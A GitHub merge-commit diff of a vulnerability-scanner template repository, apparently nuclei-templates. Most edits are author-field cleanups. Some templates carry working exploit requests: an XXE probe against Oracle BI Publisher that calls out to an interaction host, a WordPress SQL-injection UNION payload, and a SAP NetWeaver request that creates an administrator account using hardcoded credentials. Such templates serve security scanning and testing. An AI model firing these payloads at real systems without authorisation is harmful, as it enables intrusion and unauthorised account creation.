Merge pull request #57 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-06-09 18:38:21 +05:30 committed by GitHub
commit 1f36178d37
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
188 changed files with 456 additions and 305 deletions

View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 329 | vulnerabilities | 175 | exposed-panels | 146 |
| takeovers | 67 | exposures | 105 | technologies | 98 |
| misconfiguration | 67 | workflows | 32 | miscellaneous | 22 |
| cves | 331 | vulnerabilities | 175 | exposed-panels | 145 |
| takeovers | 67 | exposures | 106 | technologies | 99 |
| misconfiguration | 67 | workflows | 32 | miscellaneous | 24 |
| default-logins | 30 | exposed-tokens | 0 | dns | 9 |
| fuzzing | 9 | helpers | 8 | iot | 13 |
| fuzzing | 9 | helpers | 7 | iot | 13 |
**111 directories, 1208 files**.
**112 directories, 1216 files**.
</td>
</tr>

View File

@ -2,7 +2,7 @@ id: CVE-2013-2251
info:
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
author: exploitation & @dwisiswant0
author: exploitation,dwisiswant0
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html

View File

@ -2,7 +2,7 @@ id: CVE-2017-14849
info:
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
author: Random-Robbie
author: Random_Robbie
severity: high
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
tags: cve,cve2017,nodejs,lfi

View File

@ -1,6 +1,6 @@
id: CVE-2017-5638
info:
author: Random Robbie
author: Random_Robbie
name: Apache Struts2 RCE
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.

View File

@ -2,7 +2,7 @@ id: CVE-2017-7269
info:
name: Windows Server 2003 & IIS 6.0 RCE
author: thomas_from_offensity & @geeknik
author: thomas_from_offensity,geeknik
severity: critical
description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If <http://" in a PROPFIND request.
reference:

View File

@ -2,7 +2,7 @@ id: CVE-2017-7615
info:
name: CVE-2017-7615
author: bp0lr & dwisiswant0
author: bp0lr,dwisiswant0
severity: high
description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
tags: cve,cve2017,mantisbt

View File

@ -14,7 +14,7 @@ info:
requests:
- raw:
- |
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
@ -26,4 +26,4 @@ requests:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- "dns"

View File

@ -2,7 +2,7 @@ id: CVE-2017-9841
info:
name: CVE-2017-9841
author: Random-Robbie
author: Random_Robbie
severity: high
description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
tags: cve,cve2017,php,phpunit,rce

View File

@ -2,7 +2,7 @@ id: CVE-2018-1000129
info:
name: Jolokia XSS
author: mavericknerd @0h1in9e
author: mavericknerd,0h1in9e
severity: high
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
tags: cve,cve2018,jolokia,xss

View File

@ -2,7 +2,7 @@ id: CVE-2018-1000861
info:
name: Jenkins 2.138 Remote Command Execution
author: dhiyaneshDK & @pikpikcu
author: dhiyaneshDK,pikpikcu
severity: critical
reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
tags: cve,cve2018,jenkin,rce

View File

@ -2,7 +2,7 @@ id: CVE-2018-11409
info:
name: Splunk Sensitive Information Disclosure
author: Harsh Bothra
author: harshbothra_
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
tags: cve,cve2018,splunk

View File

@ -2,7 +2,7 @@ id: CVE-2018-11759
info:
name: Apache Tomcat JK Status Manager Access
author: Harsh Bothra
author: harshbothra_
severity: medium
reference: https://github.com/immunIT/CVE-2018-11759
tags: cve,cve2018,apache

View File

@ -17,7 +17,12 @@ requests:
words:
- "application/x-shockwave-flash"
part: header
- type: word
words:
- "javascript:alert(1337)"
part: body
- type: status
status:
- 200

View File

@ -2,7 +2,7 @@ id: CVE-2018-19439
info:
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
author: madrobot & dwisiswant0
author: madrobot,dwisiswant0
severity: high
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
tags: cve,cve2018,oracle,xss

View File

@ -2,7 +2,7 @@ id: CVE-2018-20824
info:
name: Atlassian Jira WallboardServlet XSS
author: madrobot & dwisiswant0
author: madrobot,dwisiswant0
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
tags: cve,cve2018,atlassian,jira,xss

View File

@ -2,7 +2,7 @@ id: CVE-2019-15858
info:
name: Unauthenticated Woody Ad Snippets WordPress Plugin RCE
author: dwisiswant0 & fmunozs & patralos
author: dwisiswant0,fmunozs,patralos
severity: high
description: |
This template supports the detection part only. See references.

View File

@ -2,7 +2,7 @@ id: CVE-2019-17382
info:
name: Zabbix Authentication Bypass
author: Harsh Bothra
author: harshbothra_
severity: critical
description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
reference: https://www.exploit-db.com/exploits/47467

View File

@ -1,7 +1,7 @@
id: CVE-2019-17558
info:
name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
author: pikpikcu & madrobot
author: pikpikcu,madrobot
severity: critical
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
tags: cve,cve2019,apache,rce,solr

View File

@ -2,7 +2,7 @@ id: CVE-2019-19985
info:
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
author: KBA@SOGETI_ESEC,madrobot,dwisiswant0
severity: medium
description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure.
refrense: https://www.exploit-db.com/exploits/48698

View File

@ -0,0 +1,23 @@
id: CVE-2019-2767
info:
name: Oracle Business Intelligence - Publisher XXE
author: madrobot
severity: high
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- https://www.exploit-db.com/exploits/46729
tags: cve,cve2019,oracle,xxe,oob
requests:
- raw:
- |
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

View File

@ -1,6 +1,6 @@
id: CVE-2019-3396
info:
author: Harsh Bothra
author: harshbothra_
name: Atlassian Confluence Path Traversal
severity: high
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

View File

@ -2,7 +2,7 @@ id: CVE-2019-8449
info:
name: JIRA Unauthenticated Sensitive Information Disclosure
author: Harsh Bothra
author: harshbothra_
severity: medium
description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
reference: |

View File

@ -2,7 +2,7 @@ id: CVE-2019-9978
info:
name: WordPress social-warfare RFI
author: madrobot & dwisiswant0
author: madrobot,dwisiswant0
severity: critical
description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
reference: https://github.com/mpgn/CVE-2019-9978

View File

@ -2,7 +2,7 @@ id: CVE-2020-12720
info:
name: CVE-2020-12720 vBulletin SQLI
author: pdnuclei - projectdiscovery.io
author: pdteam
severity: critical
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720

View File

@ -2,7 +2,7 @@ id: CVE-2020-5284
info:
name: Next.js .next/ limited path traversal
author: Harsh & Rahul & dwisiswant0
author: rootxharsh,iamnoooob,dwisiswant0
severity: medium
description: Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.
tags: cve,cve2020,nextjs,lfi

View File

@ -2,7 +2,7 @@ id: CVE-2020-5405
info:
name: Spring Cloud Directory Traversal
author: Harsh Bothra
author: harshbothra_
severity: high
description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
reference: https://pivotal.io/security/cve-2020-5405

View File

@ -2,7 +2,7 @@ id: CVE-2020-5902
info:
name: F5 BIG-IP TMUI RCE
author: madrobot & dwisiswant0 & ringo
author: madrobot,dwisiswant0,ringo
severity: high
description: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
reference: |

View File

@ -1,7 +1,7 @@
id: CVE-2020-6287
info:
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
name: SAP NetWeaver - Remote Admin addition
author: dwisiswant0
severity: critical
tags: cve,cve2020,sap
@ -11,24 +11,32 @@ info:
- https://launchpad.support.sap.com/#/notes/2934135
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
- https://github.com/chipik/SAP_RECON
requests:
- payloads:
data: helpers/payloads/CVE-2020-6287.xml
raw:
- raw:
- |
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=UTF-8
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>
CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==
</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
# userName - sapRpoc6351
# password - Secure!PwD8890
matchers-condition: and
matchers:
- type: word
words:
- "urn:CTCWebServiceSi"
- "CTCWebServiceSi"
- "SOAP-ENV"
part: body
condition: and
- type: status
status:
- 200
@ -36,4 +44,5 @@ requests:
- type: word
words:
- "text/xml"
part: header
- "SAP NetWeaver Application Server"
part: header

View File

@ -2,7 +2,7 @@ id: CVE-2020-8115
info:
name: Revive Adserver XSS
author: madrobot & dwisiswant0
author: madrobot,dwisiswant0
severity: medium
description: |
A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.

View File

@ -2,7 +2,7 @@ id: CVE-2020-8512
info:
name: IceWarp WebMail XSS
author: pdnuclei & dwisiswant0
author: pdteam,dwisiswant0
severity: medium
description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
reference: |

View File

@ -1,7 +1,7 @@
id: CVE-2021-22986
info:
name: F5 BIG-IP iControl REST unauthenticated RCE
author: Harsh Jaiswal (@rootxharsh) & Rahul Maini (@iamnoooob)
author: rootxharsh,iamnoooob
severity: critical
tags: bigip,cve,cve2021,rce
description: The iControl REST interface has an unauthenticated remote command execution vulnerability.

View File

@ -0,0 +1,33 @@
id: CVE-2021-24285
info:
name: Car Seller - Auto Classifieds Script WordPress plugin SQLI
author: ShreyaPohekar
severity: critical
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
tags: cve,cve2021,wordpress,wp-plugin,sqli
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 47
action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"
part: body

View File

@ -2,7 +2,7 @@ id: rabbitmq-default-admin
info:
name: RabbitMQ Default Credentials
author: fyoorer & dwisiswant0
author: fyoorer,dwisiswant0
severity: high
tags: rabbitmq,default-login

View File

@ -2,7 +2,7 @@ id: dead-host-with-cname
info:
name: dead-host-with-cname
author: pdnuclei - projectdiscovery.io
author: pdteam
severity: info
tags: dns

View File

@ -1,7 +1,7 @@
id: adminer-panel
info:
name: Adminer Login panel
author: random-robbie & meme-lord
author: random_robbie,meme-lord
severity: info
reference: https://blog.sorcery.ie/posts/adminer/
tags: panel

View File

@ -1,7 +1,7 @@
id: jmx-console
info:
name: JMX Console
author: Yash Anand @yashanand155
author: yashanand155
severity: low
tags: panel

View File

@ -2,7 +2,7 @@ id: joomla-panel
info:
name: Joomla Panel
author: github.com/its0x08
author: its0x08
severity: info
tags: panel

View File

@ -2,7 +2,7 @@ id: mobileiron-login
info:
name: MobileIron Login
author: dhiyaneshDK & @dwisiswant0
author: dhiyaneshDK,dwisiswant0
Severity: info
tags: panel

View File

@ -2,7 +2,7 @@ id: open-stack-dashboard-login
info:
name: OpenStack Dashboard
author: dhiyaneshDK & hackergautam
author: dhiyaneshDK,hackergautam
severity: info
reference: https://www.exploit-db.com/ghdb/6464
tags: panel,openstack

View File

@ -2,7 +2,7 @@ id: public-tomcat-manager
info:
name: tomcat manager disclosure
author: Ahmed Sherif & geeknik
author: Ahmed Sherif,geeknik
severity: info
tags: panel

View File

@ -1,10 +1,10 @@
id: sap-netweaver-portal-detect
id: sap-netweaver-portal
info:
name: SAP NetWeaver Portal detect
name: SAP NetWeaver Portal
author: organiccrap
severity: info
tags: panel
tags: panel,sap
# SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&

View File

@ -1,36 +0,0 @@
id: sap-recon-detect
info:
name: SAP RECON Finder
author: samueladi_ & organiccrap
severity: medium
tags: panel
# Source:- https://github.com/chipik/SAP_RECON
# This is detection template, please use above poc to exploit this further.
requests:
- method: GET
path:
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean"
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl"
- "{{BaseURL}}/CTCWebService/Config1?wsdl"
matchers-condition: and
matchers:
- type: word
words:
- Method Not Allowed
- Expected request method POST. Found GET.
- Generated by WSDLDefinitionsParser
- bns0:Config1Binding
- wsdl:definitions
- tns:CTCWebServiceSiBinding
condition: or
- type: status
status:
- 405
- 200
condition: or

View File

@ -2,7 +2,7 @@ id: traefik-dashboard-detect
info:
name: Traefik Dashboard
author: schniggie & StreetOfHackerR007
author: schniggie,StreetOfHackerR007
severity: info
tags: panel

View File

@ -2,7 +2,7 @@ id: webeditors
info:
name: Web Editors
author: pwnmachine
author: princechaddha
severity: info
tags: panel

View File

@ -2,7 +2,7 @@ id: wadl-api
info:
name: wadl file disclosure
author: 0xrudra & manuelbua
author: 0xrudra,manuelbua
severity: info
tags: exposure,api
reference: |

View File

@ -2,7 +2,7 @@ id: default-sql-dump
info:
name: MySQL Dump Files
author: geeknik & @dwisiswant0
author: geeknik,dwisiswant0
severity: medium
tags: exposure,backup

View File

@ -2,7 +2,7 @@ id: zip-backup-files
info:
name: Compressed Web File
author: Toufik Airane & @dwisiswant0
author: Toufik Airane,dwisiswant0
severity: medium
tags: exposure,backup

View File

@ -2,7 +2,7 @@ id: docker-compose-config
info:
name: docker-compose.yml exposure
author: meme-lord & blckraven & geeknik
author: meme-lord,blckraven,geeknik
severity: medium
tags: config,exposure,devops

View File

@ -2,7 +2,7 @@ id: exposed-svn
info:
name: Exposed SVN Directory
author: udit_thakkur & dwisiswant0
author: udit_thakkur,dwisiswant0
severity: medium
tags: config,exposure,svn

View File

@ -2,7 +2,7 @@ id: git-config
info:
name: Git Config Disclosure
author: pdteam & pikpikcu
author: pdteam,pikpikcu
severity: medium
description: Searches for the pattern /.git/config on passed URLs.
tags: config,git,exposure

View File

@ -2,7 +2,7 @@ id: laravel-env
info:
name: Laravel .env file accessible
author: pxmme1337 & dwisiswant0 & geeknik & emenalf
author: pxmme1337,dwisiswant0,geeknik,emenalf
severity: critical
description: Laravel uses the .env file to store sensitive information like database credentials and tokens. It should not be publicly accessible.
reference: https://laravel.com/docs/master/configuration#environment-configuration

View File

@ -2,7 +2,7 @@ id: package-json
info:
name: npm package.json disclosure
author: geeknik & afaq
author: geeknik,afaq
severity: info
description: All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project.
tags: config,exposure

View File

@ -2,7 +2,7 @@ id: phpinfo-files
info:
name: phpinfo Disclosure
author: pdteam & daffainfo & meme-lord
author: pdteam,daffainfo,meme-lord
severity: low
tags: config,exposure

View File

@ -2,7 +2,7 @@ id: rails-database-config
info:
name: Ruby-on-Rails Database Configuration Exposure
author: pdteam & geeknik
author: pdteam,geeknik
severity: low
tags: config,exposure,rails

View File

@ -1,7 +1,7 @@
id: server-private-keys
info:
name: Detect Private SSH and TLS Keys
name: Detect Private SSH, TLS, and JWT Keys
author: geeknik
severity: high
tags: config,exposure
@ -25,6 +25,10 @@ requests:
- "{{BaseURL}}/.ssh/id_dsa"
- "{{BaseURL}}/{{Hostname}}.key"
- "{{BaseURL}}/{{Hostname}}.pem"
- "{{BaseURL}}/config/jwt/private.pem"
- "{{BaseURL}}/jwt/private.pem"
- "{{BaseURL}}/var/jwt/private.pem"
- "{{BaseURL}}/private.pem"
matchers-condition: and
matchers:

View File

@ -1,9 +1,10 @@
id: shellscripts
info:
name: Published shellscripts
name: Public shellscripts
author: panch0r3d
severity: info
severity: low
tags: bash,exposure
requests:
- method: GET
@ -25,17 +26,24 @@ requests:
- "{{BaseURL}}/wp-setup.sh"
- "{{BaseURL}}/deploy.sh"
- "{{BaseURL}}/aws.sh"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/x-sh"
- "text/plain"
- "text/x-sh"
part: header
condition: or
- type: regex
regex:
- ".*?bin.*?sh"
- ".*?bin.*?bash"
part: body
condition: or

View File

@ -1,7 +1,7 @@
id: error-logs
info:
name: common error log files
author: geeknik & daffainfo
author: geeknik,daffainfo
severity: low
tags: logs,exposure

View File

@ -2,7 +2,7 @@ id: laravel-log-file
info:
name: Laravel log file publicly accessible
author: sheikhrishad & geeknik
author: sheikhrishad,geeknik
severity: high
description: The log file of this Laravel web app might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information.
reference: https://laravel.com/docs/master/logging

View File

@ -2,7 +2,7 @@ id: generic-tokens
info:
name: Generic Tokens
author: nadino & geeknik
author: nadino,geeknik
severity: info
tags: exposure,token

View File

@ -2,7 +2,7 @@ id: fcm-server-key
info:
name: FCM Server Key
author: Abss (@absshax)
author: absshax
severity: high
tags: exposure,token,google
reference: https://abss.me/posts/fcm-takeover

View File

@ -1,7 +1,7 @@
id: adminer-panel-fuzz
info:
name: Adminer Login Panel Fuzz
author: random-robbie & meme-lord
author: random_robbie,meme-lord
severity: info
reference: https://blog.sorcery.ie/posts/adminer/
tags: fuzz,adminer

View File

@ -1,7 +1,7 @@
id: generic-lfi-fuzzing
info:
name: Generic LFI Test
author: geeknik & unstabl3
author: geeknik,unstabl3
severity: high
description: A generic test for Local File Inclusion
tags: fuzz,lfi

View File

@ -1 +0,0 @@
<root><user><JavaOrABAP>java</JavaOrABAP><username>projectdiscover</username><password>proj3ctD1$c0v3ry</password><userType></userType></user></root>

View File

@ -4,6 +4,7 @@ info:
name: Apple app site association for harvesting end points
author: panch0r3d
severity: info
tags: misc
requests:
- method: GET
@ -11,16 +12,25 @@ requests:
- "{{BaseURL}}/.well-known/apple-app-site-association"
- "{{BaseURL}}/well-known/apple-app-site-association"
- "{{BaseURL}}/apple-app-site-association"
redirects: true
max-redirects: 2
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
max-redirects: 1
matchers-condition: and
matchers:
- type: regex
regex:
- '(a|A)(p|P)(p|P)(l|L)(i|I)(n|N)(k|K)(s|S)'
- type: word
words:
- 'applinks'
- 'appID'
- 'paths'
part: body
condition: and
- type: word
words:
- 'application/json'
part: header
- type: status
status:
- 200

View File

@ -2,7 +2,7 @@ id: dir-listing
info:
name: Directory listing enabled
author: _harleo & pentest_swissky
author: _harleo,pentest_swissky
severity: info
tags: misc

View File

@ -1,20 +1,16 @@
id: email-address-extraction
id: email-extractor
info:
name: Extract Email addresses
name: Email Extractor
author: panch0r3d
severity: info
tags: misc,email
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
regex:
- "[a-zA-Z0-9-_.]{4,}@[A-Za-z0-9_-]+[.](com|org|net|io|gov|co|co.uk|com.mx|com.br|com.sv|co.cr|com.gt|com.hn|com.ni|com.au|com.cn)"
extractors:
- type: regex
part: body

View File

@ -2,7 +2,7 @@ id: aem-groovyconsole
info:
name: AEM Groovy console enabled
author: twitter.com/Dheerajmadhukar
author: Dheerajmadhukar
severity: critical
description: Groovy console is exposed, RCE is possible.
reference: https://hackerone.com/reports/672243

View File

@ -1,27 +1,29 @@
id: artifactory-anonymous-deploy
info:
name: Artifactory repos with anonymous deploy permissions
name: Artifactory anonymous deploy
reference: https://www.errno.fr/artifactory/Attacking_Artifactory.html
author: panch0r3d
severity: high
tags: artifactory
requests:
- method: GET
path:
- "{{BaseURL}}/artifactory/ui/repodata?deploy=true"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
matchers-condition: and
matchers:
- type: regex
regex:
- '(repoList).*?["].*["]'
- '(repoTypesList).*?["].*["]'
- type: word
words:
- '"repoKey"'
part: body
extractors:
- type: regex
part: body
regex:
- '(repoTypesList).*?["].*["]'
- '(repoList).*?["].*["]'
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header

View File

@ -2,7 +2,7 @@ id: django-debug
info:
name: Django Debug Method Enabled
author: dhiyaneshDK & hackergautam
author: dhiyaneshDK,hackergautam
severity: medium
tags: django,debug

View File

@ -1,7 +1,7 @@
id: druid-monitor
info:
name: Druid Monitor Unauthorized Access
author: 0h1in9e @ohlinge
author: ohlinge
severity: high
tags: druid,unauth

View File

@ -2,7 +2,7 @@ id: exposed-docker-api
info:
name: Exposed Docker API
author: furkansenan & dwisiswant0
author: furkansenan,dwisiswant0
severity: info
tags: docker,unauth,devops

View File

@ -1,27 +0,0 @@
id: firebase-urls
info:
name: Find firebaseio urls to check for security permissions
author: panch0r3d
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/"
redirects: true
max-redirects: 5
headers:
User-Agent: "Mozilla UACanary12345"
matchers-condition: and
matchers:
- type: regex
regex:
- ".*?(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?"
part: body
extractors:
- type: regex
part: body
regex:
